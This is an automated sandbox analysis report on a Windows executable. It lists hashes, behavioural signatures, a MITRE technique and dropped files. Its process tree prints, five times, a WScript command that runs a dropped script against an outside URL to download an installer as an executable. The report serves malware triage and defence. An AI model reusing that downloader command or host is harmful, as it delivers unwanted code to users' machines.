af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74

Analysis

max time kernel
99s
max time network
100s
platform
windows7_x64
resource
win7-20220901-en
resource tags

arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
submitted
04/12/2022, 10:11

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe
Size

184KB
MD5

2d12010eb0d98c904079202d2786ffa7
SHA1

ec0eddad52314c47f88adab43ed8def70a8d17b7
SHA256

af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74
SHA512

634d3f17ce71c5342ce327bb08f55f452cfb7de96b173e20b133133e18711f96b75dbc634569d4790b6d4358e20f7994dd2f0f505f409e7e305c5192aa4ab3fa
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3/:/7BSH8zUB+nGESaaRvoB7FJNndne

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 15 IoCs

flow	pid	Process
2	840	WScript.exe
5	840	WScript.exe
6	1832	WScript.exe
8	1832	WScript.exe
9	1828	WScript.exe
11	1828	WScript.exe
12	1744	WScript.exe
14	1744	WScript.exe
17	1744	WScript.exe
19	1744	WScript.exe
21	1744	WScript.exe
22	1216	WScript.exe
24	1216	WScript.exe
25	1216	WScript.exe
26	1216	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	9	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	12	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	22	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1564 wrote to memory of 840	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	26
PID 1564 wrote to memory of 840	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	26
PID 1564 wrote to memory of 840	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	26
PID 1564 wrote to memory of 840	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	26
PID 1564 wrote to memory of 1832	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	29
PID 1564 wrote to memory of 1832	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	29
PID 1564 wrote to memory of 1832	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	29
PID 1564 wrote to memory of 1832	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	29
PID 1564 wrote to memory of 1828	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	30
PID 1564 wrote to memory of 1828	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	30
PID 1564 wrote to memory of 1828	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	30
PID 1564 wrote to memory of 1828	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	30
PID 1564 wrote to memory of 1744	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	32
PID 1564 wrote to memory of 1744	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	32
PID 1564 wrote to memory of 1744	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	32
PID 1564 wrote to memory of 1744	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	32
PID 1564 wrote to memory of 1216	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	34
PID 1564 wrote to memory of 1216	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	34
PID 1564 wrote to memory of 1216	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	34
PID 1564 wrote to memory of 1216	1564	af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe	34

C:\Users\Admin\AppData\Local\Temp\af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe
"C:\Users\Admin\AppData\Local\Temp\af7af97cd525dae5a29ced15d2500030aac1d0a19a3ad321980dc580520f4f74.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1564
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3489.js" http://www.djapp.info/?domain=lXELQQbDQX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3489.exe
  2⤵
  - Blocklisted process makes network request
  PID:840
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3489.js" http://www.djapp.info/?domain=lXELQQbDQX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3489.exe
  2⤵
  - Blocklisted process makes network request
  PID:1832
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3489.js" http://www.djapp.info/?domain=lXELQQbDQX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3489.exe
  2⤵
  - Blocklisted process makes network request
  PID:1828
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3489.js" http://www.djapp.info/?domain=lXELQQbDQX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3489.exe
  2⤵
  - Blocklisted process makes network request
  PID:1744
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf3489.js" http://www.djapp.info/?domain=lXELQQbDQX.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=101&setup_id=300 C:\Users\Admin\AppData\Local\Temp\fuf3489.exe
  2⤵
  - Blocklisted process makes network request
  PID:1216

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
a4feaf11ab2269212883b999a17c7231

SHA1
73c157251f256fb9764366c49afd47fb55f466e1

SHA256
70740b40b5705b771ceb8a6229e49882aad320363388a0a44f38bacf502cdc81

SHA512
93a285cfadf4ea47a83f6130d72f4c3ab9da56911774601469211d403e5239c498d6855bc4362534289ae895ebf095bdfe4c24d1d327d0acfb01009756a21f47

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
280B

MD5
986eda6a044d40b54bc41dfac0bfed2b

SHA1
d7928d9714ff509a0ba1f101be7307b01b785867

SHA256
ecaa7e6680e036e4538113e4a83faff190440faf053328406e0f2f8ad3458944

SHA512
b2d071d3e3ef9527b554d30bbadd2c5231fe60bec26aa2dbb30b9e8c32db982e756c570910755af85d1435193ad3af2f9131a59a71f345992d53a4c8948120a2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
438B

MD5
d20938fea667d9ec40e253d2b30e4e8a

SHA1
700d782923580c5ee3628274ac926862b273ba9e

SHA256
90642d848cf192d2be085c950219f992cdd0f99d15ddbd5b8baf07bda7bbd666

SHA512
14f96b8a7af179d13b0194aa45d85062b734a0fef7444d4a6b2ccd3ff44216550762b8942cb5ac229203645ccb09573b59cf9307d0147a1015480bd9d8e7afab

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
c34169f9abebbac695073fe4276e67e1

SHA1
0aa9358b859642135b61937e355c6802818ceab8

SHA256
0b9760d5d954a5d1eab600191315a8af09ba62af0c96d74d85fc50f9193eb6a3

SHA512
d0c32f8d707231e450f21622e81200b7820763ca71c5efcf09d34a348f902163b9960dffdc2672f70507b752204fa83c19d9bc09a8166ea9a04b3034b8504ed4

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
426B

MD5
c13df0485789e666003a60013c26d803

SHA1
cf3f0ae5231227e682479ec1cd655fd2836e40a1

SHA256
555253cfd2d9600e6afdc46ccb31c2e85d86f56c13829c3c726eb0a44a4600dd

SHA512
5931d63e9a724e771fc2dcc546b7c6a132133101cb6d467ccd7c9838f2d0594b5407a6614c8c0d2bdeec59c2e213c20f18e358068f620bcdc8ddfc28928260c6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\TAR9OKL9\domain_profile[1].htm

Filesize
43KB

MD5
ccf28e9a7c63954c4ad9f317939ad0b9

SHA1
a8b67a61e392c61be414b3832029256abacab3d4

SHA256
432e09f50bd8aaa39a8bac1a93b4d57f4b8a317e6bd5581d76d4081fc80593d6

SHA512
439b6752dbb4676e53a548d2cb6281cbfa5781bbcba85e7d86993526f729f15241c788765ed3c542d67062542b6e08e60f6ba594c128de74083c8ecf6ad5b718

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf3489.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4KG8GVPD.txt

Filesize
100B

MD5
62f335f43b2bd35a055c984eaec72acc

SHA1
5df92bfc16b377b5e2646b3ffb8cebdbc6df4cd2

SHA256
f59921a24e81470954aa25512f21330f1927d60dbb8eb458b96692c46b84aa01

SHA512
d2a797de4df6ea465dfc1289bc557cb56534ddd822afcee0fc9d1d03afe44b3eac2b60047fc5ed1085bb50908d0c30697e69021907ed76c351aad6d7a1009c93

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\4L8KHSRG.txt

Filesize
177B

MD5
4858b7932141ffac477220379604d234

SHA1
112b80cf4d812e75b87658b8bb4a861fdf0cc0c1

SHA256
da731ba59b329ee19573b98edd6994b747e7123fb8e2a2df6d88df89ace0f19a

SHA512
aa6c4351d1829f6ea5afb7342eb30520dc05ff01ba7f694d99e7d8f2da40d52cb61ee0d67e874a4499f2cf877abffba193340f3071983fa1d46bf1eeb6701850

Download Submit
memory/1564-54-0x0000000075681000-0x0000000075683000-memory.dmp

Filesize
8KB

Download